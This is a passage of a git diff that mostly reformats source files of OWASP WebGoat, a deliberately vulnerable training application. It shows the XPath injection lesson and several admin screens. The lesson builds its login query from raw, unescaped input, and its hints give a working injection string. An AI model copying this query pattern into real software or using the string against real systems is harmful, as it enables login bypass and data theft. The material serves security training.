@@ -32,234 +31,208 @@ import org.apache.ecs.html.BR;
 import org.apache.ecs.html.B;
 import org.apache.ecs.html.PRE;
 import org.apache.ecs.HtmlColor;
-
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.ECSFactory;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
- * @created    November 28, 2006
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created November 28, 2006
  */
 
 public class XPATHInjection extends LessonAdapter
 {
 
-    private final static Integer DEFAULT_RANKING = new Integer(74);
+	private final static Integer DEFAULT_RANKING = new Integer(74);
 
-    private final static String USERNAME = "Username";
+	private final static String USERNAME = "Username";
 
-    private final static String PASSWORD = "Password";
+	private final static String PASSWORD = "Password";
 
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
-    protected Element createContent(WebSession s)
-    {
-
-	NodeList nodes = null;
-	ElementContainer ec = new ElementContainer();
-
-	try
+	protected Element createContent(WebSession s)
 	{
-	    ec.addElement(new BR().addElement(new H1()
-		    .addElement("Welcome to WebGoat employee intranet")));
-	    ec.addElement(new BR());
-	    Table t1 = new Table().setCellSpacing(0).setCellPadding(0)
-		    .setBorder(0).setWidth("90%").setAlign("center");
 
-	    TR tr = new TR();
-	    tr
-		    .addElement(new TH()
-			    .addElement(
-				    "Please confirm your username and password before viewing your profile.")
-			    .setColSpan(2).setAlign("left"));
-	    t1.addElement(tr);
+		NodeList nodes = null;
+		ElementContainer ec = new ElementContainer();
 
-	    tr = new TR();
-	    tr.addElement(new TD().addElement("*Required Fields").setWidth(
-		    "30%").setColSpan(2).setAlign("left"));
-	    t1.addElement(tr);
+		try
+		{
+			ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat employee intranet")));
+			ec.addElement(new BR());
+			Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
 
-	    tr = new TR();
-	    tr.addElement(new TD().addElement("&nbsp").setWidth("30%")
-		    .setColSpan(2).setAlign("left"));
-	    t1.addElement(tr);
+			TR tr = new TR();
+			tr.addElement(new TH().addElement("Please confirm your username and password before viewing your profile.")
+					.setColSpan(2).setAlign("left"));
+			t1.addElement(tr);
 
-	    tr = new TR();
-	    tr.addElement(new TD(new B(new StringElement("*User Name: "))));
+			tr = new TR();
+			tr.addElement(new TD().addElement("*Required Fields").setWidth("30%").setColSpan(2).setAlign("left"));
+			t1.addElement(tr);
 
-	    Input input1 = new Input(Input.TEXT, USERNAME, "");
-	    tr.addElement(new TD(input1));
-	    t1.addElement(tr);
+			tr = new TR();
+			tr.addElement(new TD().addElement("&nbsp").setWidth("30%").setColSpan(2).setAlign("left"));
+			t1.addElement(tr);
 
-	    tr = new TR();
-	    tr.addElement(new TD(new B(new StringElement("*Password: "))));
+			tr = new TR();
+			tr.addElement(new TD(new B(new StringElement("*User Name: "))));
 
-	    Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
-	    tr.addElement(new TD(input2));
-	    t1.addElement(tr);
+			Input input1 = new Input(Input.TEXT, USERNAME, "");
+			tr.addElement(new TD(input1));
+			t1.addElement(tr);
 
-	    Element b = ECSFactory.makeButton("Submit");
-	    t1.addElement(new TR(new TD(b)));
-	    ec.addElement(t1);
+			tr = new TR();
+			tr.addElement(new TD(new B(new StringElement("*Password: "))));
 
-	    String username = s.getParser().getRawParameter(USERNAME, "");
-	    if (username == null || username.length() == 0)
-	    {
-		ec.addElement(new P().addElement(new StringElement(
-			"Username is a required field")));
+			Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+			tr.addElement(new TD(input2));
+			t1.addElement(tr);
+
+			Element b = ECSFactory.makeButton("Submit");
+			t1.addElement(new TR(new TD(b)));
+			ec.addElement(t1);
+
+			String username = s.getParser().getRawParameter(USERNAME, "");
+			if (username == null || username.length() == 0)
+			{
+				ec.addElement(new P().addElement(new StringElement("Username is a required field")));
+				return ec;
+			}
+
+			String password = s.getParser().getRawParameter(PASSWORD, "");
+			if (password == null || password.length() == 0)
+			{
+				ec.addElement(new P().addElement(new StringElement("Password is a required field")));
+				return ec;
+			}
+
+			String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");
+			File d = new File(dir);
+			XPathFactory factory = XPathFactory.newInstance();
+			XPath xPath = factory.newXPath();
+			InputSource inputSource = new InputSource(new FileInputStream(d));
+			String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password
+					+ "']";
+			nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);
+			int nodesLength = nodes.getLength();
+
+			Table t2 = null;
+			if (nodesLength > 0)
+			{
+				t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(1).setWidth("90%").setAlign("center");
+				tr = new TR();
+				tr.setBgColor(HtmlColor.GRAY);
+				tr.addElement(new TD().addElement("Username"));
+				tr.addElement(new TD().addElement("Account No."));
+				tr.addElement(new TD().addElement("Salary"));
+				t2.addElement(tr);
+			}
+
+			for (int i = 0; i < nodesLength; i++)
+			{
+				Node node = nodes.item(i);
+				String[] arrTokens = node.getTextContent().split("[\\t\\s\\n]+");
+
+				tr = new TR();
+				tr.addElement(new TD().addElement(arrTokens[1]));
+				tr.addElement(new TD().addElement(arrTokens[2]));
+				tr.addElement(new TD().addElement(arrTokens[4]));
+				t2.addElement(tr);
+
+			}
+			if (nodes.getLength() > 1)
+			{
+				makeSuccess(s);
+			}
+			if (t2 != null)
+			{
+				ec.addElement(new PRE());
+				ec.addElement(t2);
+			}
+
+		} catch (IOException e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		} catch (IllegalArgumentException e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		} catch (XPathExpressionException e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
 		return ec;
-	    }
-
-	    String password = s.getParser().getRawParameter(PASSWORD, "");
-	    if (password == null || password.length() == 0)
-	    {
-		ec.addElement(new P().addElement(new StringElement(
-			"Password is a required field")));
-		return ec;
-	    }
-
-	    String dir = s.getContext().getRealPath(
-		    "/lessons/XPATHInjection/EmployeesData.xml");
-	    File d = new File(dir);
-	    XPathFactory factory = XPathFactory.newInstance();
-	    XPath xPath = factory.newXPath();
-	    InputSource inputSource = new InputSource(new FileInputStream(d));
-	    String expression = "/employees/employee[loginID/text()='"
-		    + username + "' and passwd/text()='" + password + "']";
-	    nodes = (NodeList) xPath.evaluate(expression, inputSource,
-		    XPathConstants.NODESET);
-	    int nodesLength = nodes.getLength();
-
-	    Table t2 = null;
-	    if (nodesLength > 0)
-	    {
-		t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
-			1).setWidth("90%").setAlign("center");
-		tr = new TR();
-		tr.setBgColor(HtmlColor.GRAY);
-		tr.addElement(new TD().addElement("Username"));
-		tr.addElement(new TD().addElement("Account No."));
-		tr.addElement(new TD().addElement("Salary"));
-		t2.addElement(tr);
-	    }
-
-	    for (int i = 0; i < nodesLength; i++)
-	    {
-		Node node = nodes.item(i);
-		String[] arrTokens = node.getTextContent()
-			.split("[\\t\\s\\n]+");
-
-		tr = new TR();
-		tr.addElement(new TD().addElement(arrTokens[1]));
-		tr.addElement(new TD().addElement(arrTokens[2]));
-		tr.addElement(new TD().addElement(arrTokens[4]));
-		t2.addElement(tr);
-
-	    }
-	    if (nodes.getLength() > 1)
-	    {
-		makeSuccess(s);
-	    }
-	    if (t2 != null)
-	    {
-		ec.addElement(new PRE());
-		ec.addElement(t2);
-	    }
-
 	}
-	catch (IOException e)
+
+	public Element getCredits()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
 	}
-	catch (IllegalArgumentException e)
+
+	protected Category getDefaultCategory()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+
+		return Category.INJECTION;
 	}
-	catch (XPathExpressionException e)
+
+	protected boolean getDefaultHidden()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		// TODO Auto-generated method stub
+		return false;
 	}
-	return ec;
-    }
 
+	protected Integer getDefaultRanking()
+	{
 
-    public Element getCredits()
-    {
-	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
-    }
+		return DEFAULT_RANKING;
+	}
 
+	protected List<String> getHints(WebSession s)
+	{
+		// TODO Auto-generated method stub
+		List<String> hints = new ArrayList<String>();
+		hints.add("Remember that the data is stored in XML format.");
+		hints.add("The system is using XPath to query.");
+		hints.add("XPath is almost the same thing as SQL, the same hacking techniques apply too.");
+		hints.add("Try username: Smith' or 1=1 or 'a'='a and a password: anything ");
+		return hints;
+	}
 
-    protected Category getDefaultCategory()
-    {
+	public String getTitle()
+	{
 
-	return Category.INJECTION;
-    }
-
-
-    protected boolean getDefaultHidden()
-    {
-	// TODO Auto-generated method stub
-	return false;
-    }
-
-
-    protected Integer getDefaultRanking()
-    {
-
-	return DEFAULT_RANKING;
-    }
-
-
-    protected List<String> getHints(WebSession s)
-    {
-	// TODO Auto-generated method stub
-	List<String> hints = new ArrayList<String>();
-	hints.add("Remember that the data is stored in XML format.");
-	hints.add("The system is using XPath to query.");
-	hints
-		.add("XPath is almost the same thing as SQL, the same hacking techniques apply too.");
-	hints
-		.add("Try username: Smith' or 1=1 or 'a'='a and a password: anything ");
-	return hints;
-    }
-
-
-    public String getTitle()
-    {
-
-	return "XPATH Injection";
-    }
+		return "XPATH Injection";
+	}
 
 }
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java
index 95951a940..0b3e32f48 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java
@@ -1,104 +1,104 @@
+
 package org.owasp.webgoat.lessons.admin;
 
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.session.Screen;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public abstract class AdminScreen extends Screen
 {
 
-    /**
-     *  Description of the Field
-     */
-    protected String query = null;
+	/**
+	 * Description of the Field
+	 */
+	protected String query = null;
 
+	/**
+	 * Constructor for the AdminScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param q
+	 *            Description of the Parameter
+	 */
+	public AdminScreen(WebSession s, String q)
+	{
+		setQuery(q);
 
-    /**
-     *  Constructor for the AdminScreen object
-     *
-     * @param  s  Description of the Parameter
-     * @param  q  Description of the Parameter
-     */
-    public AdminScreen(WebSession s, String q)
-    {
-	setQuery(q);
+		// setupAdmin(s); FIXME: what was this supposed to do?
+	}
 
-	// setupAdmin(s);  FIXME: what was this supposed to do?
-    }
+	/**
+	 * Constructor for the AdminScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public AdminScreen(WebSession s)
+	{
+	}
 
+	/**
+	 * Constructor for the AdminScreen object
+	 */
+	public AdminScreen()
+	{
+	}
 
-    /**
-     *  Constructor for the AdminScreen object
-     *
-     * @param  s  Description of the Parameter
-     */
-    public AdminScreen(WebSession s)
-    {}
+	/**
+	 * Gets the title attribute of the AdminScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Admin Information");
+	}
 
+	public String getRole()
+	{
+		return AbstractLesson.ADMIN_ROLE;
+	}
 
-    /**
-     *  Constructor for the AdminScreen object
-     */
-    public AdminScreen()
-    {}
-
-
-    /**
-     *  Gets the title attribute of the AdminScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Admin Information");
-    }
-
-
-    public String getRole()
-    {
-	return AbstractLesson.ADMIN_ROLE;
-    }
-
-
-    /**
-     *  Sets the query attribute of the AdminScreen object
-     *
-     * @param  q  The new query value
-     */
-    public void setQuery(String q)
-    {
-	query = q;
-    }
+	/**
+	 * Sets the query attribute of the AdminScreen object
+	 * 
+	 * @param q
+	 *            The new query value
+	 */
+	public void setQuery(String q)
+	{
+		query = q;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java
index 7a19cab7c..665552856 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ProductsAdminScreen.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons.admin;
 
 import java.sql.Connection;
 import java.sql.ResultSet;
 import java.sql.ResultSetMetaData;
 import java.sql.Statement;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.owasp.webgoat.lessons.Category;
@@ -12,117 +12,110 @@ import org.owasp.webgoat.lessons.LessonAdapter;
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class ProductsAdminScreen extends LessonAdapter
 {
 
-    private final static String QUERY = "SELECT * FROM product_system_data";
+	private final static String QUERY = "SELECT * FROM product_system_data";
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-		Connection connection = DatabaseUtilities.getConnection(s);
+		ElementContainer ec = new ElementContainer();
 
-	    Statement statement = connection.createStatement(
-		    ResultSet.TYPE_SCROLL_INSENSITIVE,
-		    ResultSet.CONCUR_READ_ONLY);
-	    ResultSet results = statement.executeQuery(QUERY);
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection(s);
 
-	    if (results != null)
-	    {
-		makeSuccess(s);
-		ResultSetMetaData resultsMetaData = results.getMetaData();
-		ec.addElement(DatabaseUtilities.writeTable(results,
-			resultsMetaData));
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+			Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+																ResultSet.CONCUR_READ_ONLY);
+			ResultSet results = statement.executeQuery(QUERY);
+
+			if (results != null)
+			{
+				makeSuccess(s);
+				ResultSetMetaData resultsMetaData = results.getMetaData();
+				ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+
+		return (ec);
 	}
 
-	return (ec);
-    }
+	/**
+	 * Gets the category attribute of the ProductsAdminScreen object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.ADMIN_FUNCTIONS;
+	}
 
+	/**
+	 * Gets the role attribute of the ProductsAdminScreen object
+	 * 
+	 * @return The role value
+	 */
+	public String getRole()
+	{
+		return HACKED_ADMIN_ROLE;
+	}
 
-    /**
-     *  Gets the category attribute of the ProductsAdminScreen object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.ADMIN_FUNCTIONS;
-    }
+	/**
+	 * Gets the title attribute of the ProductsAdminScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Product Information");
+	}
 
+	private final static Integer DEFAULT_RANKING = new Integer(1000);
 
-    /**
-     *  Gets the role attribute of the ProductsAdminScreen object
-     *
-     * @return    The role value
-     */
-    public String getRole()
-    {
-	return HACKED_ADMIN_ROLE;
-    }
-
-
-    /**
-     *  Gets the title attribute of the ProductsAdminScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Product Information");
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(1000);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java
index c5da5e124..b3e70e003 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/RefreshDBScreen.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons.admin;
 
 import java.sql.Connection;
 import org.owasp.webgoat.lessons.*;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -12,155 +12,146 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.*;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    October 28, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created October 28, 2003
  */
 public class RefreshDBScreen extends LessonAdapter
 {
 
-    private final static String REFRESH = "Refresh";
+	private final static String REFRESH = "Refresh";
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
 	{
-	    boolean refresh = s.getParser().getBooleanParameter(REFRESH, false);
+		ElementContainer ec = new ElementContainer();
 
-	    if (refresh)
-	    {
-		refreshDB(s);
-		ec.addElement(new StringElement(
-			"Successfully refreshed the database."));
-	    }
-	    else
-	    {
-		Element label = new StringElement("Refresh the database? ");
-		A link1 = ECSFactory.makeLink("Yes", REFRESH, true);
-		A link2 = ECSFactory.makeLink("No", REFRESH, false);
-		TD td1 = new TD().addElement(label);
-		TD td2 = new TD().addElement(link1);
-		TD td3 = new TD().addElement(link2);
-		TR row = new TR().addElement(td1).addElement(td2).addElement(
-			td3);
-		Table t = new Table().setCellSpacing(40).setWidth("50%");
-
-		if (s.isColor())
+		try
 		{
-		    t.setBorder(1);
+			boolean refresh = s.getParser().getBooleanParameter(REFRESH, false);
+
+			if (refresh)
+			{
+				refreshDB(s);
+				ec.addElement(new StringElement("Successfully refreshed the database."));
+			}
+			else
+			{
+				Element label = new StringElement("Refresh the database? ");
+				A link1 = ECSFactory.makeLink("Yes", REFRESH, true);
+				A link2 = ECSFactory.makeLink("No", REFRESH, false);
+				TD td1 = new TD().addElement(label);
+				TD td2 = new TD().addElement(link1);
+				TD td3 = new TD().addElement(link2);
+				TR row = new TR().addElement(td1).addElement(td2).addElement(td3);
+				Table t = new Table().setCellSpacing(40).setWidth("50%");
+
+				if (s.isColor())
+				{
+					t.setBorder(1);
+				}
+
+				t.addElement(row);
+				ec.addElement(t);
+			}
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
 		}
 
-		t.addElement(row);
-		ec.addElement(t);
-	    }
+		return (ec);
 	}
-	catch (Exception e)
+
+	/**
+	 * Gets the category attribute of the RefreshDBScreen object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return Category.ADMIN_FUNCTIONS;
 	}
 
-	return (ec);
-    }
+	private final static Integer DEFAULT_RANKING = new Integer(1000);
 
-
-    /**
-     *  Gets the category attribute of the RefreshDBScreen object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.ADMIN_FUNCTIONS;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(1000);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the role attribute of the RefreshDBScreen object
-     *
-     * @return    The role value
-     */
-    public String getRole()
-    {
-	return ADMIN_ROLE;
-    }
-
-
-    /**
-     *  Gets the title attribute of the RefreshDBScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Refresh Database");
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     */
-    public void refreshDB(WebSession s)
-    {
-	try
+	protected Integer getDefaultRanking()
 	{
-		Connection connection = DatabaseUtilities.getConnection(s);
+		return DEFAULT_RANKING;
+	}
 
-	    CreateDB db = new CreateDB();
-	    db.makeDB(connection);
-	    System.out.println("Successfully refreshed the database.");
-	}
-	catch (Exception e)
+	/**
+	 * Gets the role attribute of the RefreshDBScreen object
+	 * 
+	 * @return The role value
+	 */
+	public String getRole()
 	{
-	    s.setMessage("Error refreshing database "
-		    + this.getClass().getName());
-	    e.printStackTrace();
+		return ADMIN_ROLE;
+	}
+
+	/**
+	 * Gets the title attribute of the RefreshDBScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Refresh Database");
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 */
+	public void refreshDB(WebSession s)
+	{
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection(s);
+
+			CreateDB db = new CreateDB();
+			db.makeDB(connection);
+			System.out.println("Successfully refreshed the database.");
+		} catch (Exception e)
+		{
+			s.setMessage("Error refreshing database " + this.getClass().getName());
+			e.printStackTrace();
+		}
 	}
-    }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java
index 7381fd848..88d83b819 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ReportCardScreen.java
@@ -1,7 +1,7 @@
+
 package org.owasp.webgoat.lessons.admin;
 
 import java.util.Iterator;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.HtmlColor;
@@ -20,302 +20,286 @@ import org.owasp.webgoat.session.Screen;
 import org.owasp.webgoat.session.UserTracker;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
